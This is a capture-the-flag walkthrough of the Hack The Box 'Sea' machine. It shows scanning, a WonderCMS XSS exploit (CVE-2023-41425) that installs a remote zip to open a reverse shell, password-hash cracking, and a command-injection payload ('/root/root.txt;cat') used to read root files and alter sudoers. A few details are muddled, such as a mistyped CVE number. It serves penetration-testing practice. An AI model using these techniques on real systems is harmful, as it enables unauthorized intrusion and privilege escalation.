Introduction to Sea:

This write-up will explore the “Sea” machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Sea” machine from Hack The Box by achieving the following objectives:

User Flag:

CVE-2023-4142 Exploitation:

This machine is exposed to CVE-2023-41425, a Cross-Site Scripting (XSS) issue found in Wonder CMS versions 3.2.0 to 3.4.2. The vulnerability allows an attacker to inject malicious scripts remotely.

Impact of the Exploit:

By exploiting this flaw, an attacker can upload a carefully crafted script to the installModule component, executing arbitrary code and potentially compromising the system’s integrity.

Root Flag:

System Detection and Log Activity:

The system seems to be monitoring for “suspicious content” in certain paths. While we cleared the “apt” logs, the access.log file was not fully cleared, containing traces of malicious activity from previous brute-forcing attempts. However, the access.log is now “empty,” indicating that filtering mechanisms are likely in place to track and block certain actions.

Privilege Escalation Detection:

When testing with “/root/root.txt” as the log_file parameter, the system successfully detected the file, possibly indicating that it was accessed with root privileges. This suggests that the system is actively filtering attempts to access sensitive files or escalate privileges.

Enumerating the Sea Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.


nmap -sC -sV -oN nmap_initial.txt 10.10.11.28

Nmap Output:

┌─[darknite@parrot]─[~/Documents/htb/sea]
└──╼ $nmap -sC -sV 10.10.11.28 -oA initial
# Nmap 7.94SVN scan initiated Mon Aug 12 18:42:25 2024 as: nmap -sC -sV -oA initial 10.10.11.28
Nmap scan report for 10.10.11.28 (10.10.11.28)
Host is up (0.053s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Sea - Home
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 12 18:42:33 2024 -- 1 IP address (1 host up) scanned in 8.09 seconds 

Analysis:

  • Port 22 (SSH): Secure Shell service (OpenSSH 8.2p1) for remote access on Ubuntu.
  • Port 80 (HTTP): Apache web server (2.4.41) hosting the “Sea – Home” website on Ubuntu.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.


gobuster dir -u http://sea.htb-w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt 

Gobuster Output:

Analysis:

The scan of the root directory reveals four subdirectories:

  • data
  • messages
  • plugins
  • themes

I noticed a particular directory that stood out to me.

Exploitation

Web Application Exploration:

After exploring each web service page, I noticed that contact.php” stands out due to its form. We suspect the “Website” field may be susceptible to XSS or CSRF attacks.

Let’s provide some input to check for any valuable information.

Nothing stands out significantly.

However, we can confirm that the form was successfully submitted to the server.

Nothing stands out at all.

The /themes/bike/version endpoint discloses the theme version used by the CMS.

README.md revealed the application being used in the system.

WonderCMS bike theme enumeration

What is CVE-2023-41425?

CVE-2023-41425 is a Cross-Site Scripting (XSS) vulnerability found in Wonder CMS versions 3.2.0 to 3.4.2. This flaw allows a malicious actor to inject harmful scripts into the website, potentially enabling them to steal user data, hijack sessions, or carry out other malicious activities.

How does CVE-2023-41425 work?
The vulnerability is present in the installModule component of Wonder CMS. An attacker can upload a specially crafted script to this component, which, when executed, lets them inject malicious code into the website.

There is some information that is useful to us, particularly for further escalation. The source for the matter can be found here

Let’s attempt the exploit I discovered on the GitHub page.

Exploit code analysis

This code is a malicious script designed to exploit a vulnerability in a website running WonderCMS. Here’s a breakdown of what it does in simpler terms:

  1. Extracting information: The script starts by getting the URL of the site (the web address). It then removes the trailing slash and strips away the part of the URL related to the login page to focus on the main part of the site’s address.
  2. Grabbing a security token: It finds a security token (a piece of data that proves a user is authenticated) on the page. This token is needed for the exploit to work, as it helps make the request seem legitimate.
  3. Triggering the malicious install: The script then constructs a URL that points to a malicious file (rev.zip) hosted on the attacker’s server. It tricks the CMS into thinking this file is a valid module to install, using the token for authentication. The CMS will then download and install the file without proper checks.
  4. Calling a reverse shell: After the malicious file is installed, the script tries to run a PHP script (rev.php) from the installed module. This script connects back to the attacker’s machine and opens up a “reverse shell,” which is a way for the attacker to control the website remotely.
  5. Connecting to the attacker: Finally, the script sends information about the attacker’s machine (like the IP address and port number) to set up a connection, allowing the attacker to gain control over the server.

WonderCMS function that we need to understand

The installUpdateModuleAction function in WonderCMS is responsible for managing the installation or updating of themes and plugins. It begins by validating user input and checking for the presence of the installModule and type parameters in the request. The function then proceeds to download the required zip file, extract its contents, and install the module into the specified directory. It incorporates error handling to address issues such as download failures, zip extraction problems, and directory manipulation errors. Finally, it provides the user with feedback regarding the outcome of the installation.

In essence, if the URL contains a zip file link in the installModule parameter and a folder path in the type parameter, the CMS will automatically download and install the specified content without further validation.

Another exploit script on Sea machine

Let’s run the exploit on our machine and use the XSS payload to trigger the reverse shell callback.

Unfortunately, nothing happened after waiting for a few minutes. As a result, let’s change the exploit code to another script which can be found here

Surprisingly, it worked like a charm.

We have access to it with a www-data shell.

Shell as AMAY user access on Sea machine

After exploring the victim’s machine, we found a database containing a hash that we could attempt to crack.

We have successfully obtained the password, but we are unsure which user it belongs to.

We can view the user flag by running the “cat user.txt” command.

Escalate to Root Privileges Access on Sea Machine

Privilege Escalation:

It is important to verify other open ports on the machine in addition to those identified by Nmap.

Let’s set up port forwarding using port 8080.

Let’s enter the credentials as Amay here.

It appears to be a System Monitor, as shown above.

The access.log will appear similar to the example shown above.

It took the response in BurpSuite above

We can view the root flag by injecting the “/root/root.txt;cat” command.

I were considering a similar approach: “Grant Amay sudo privileges.” Proceed by updating the payload to modify the sudoers file.

It was successfully executed.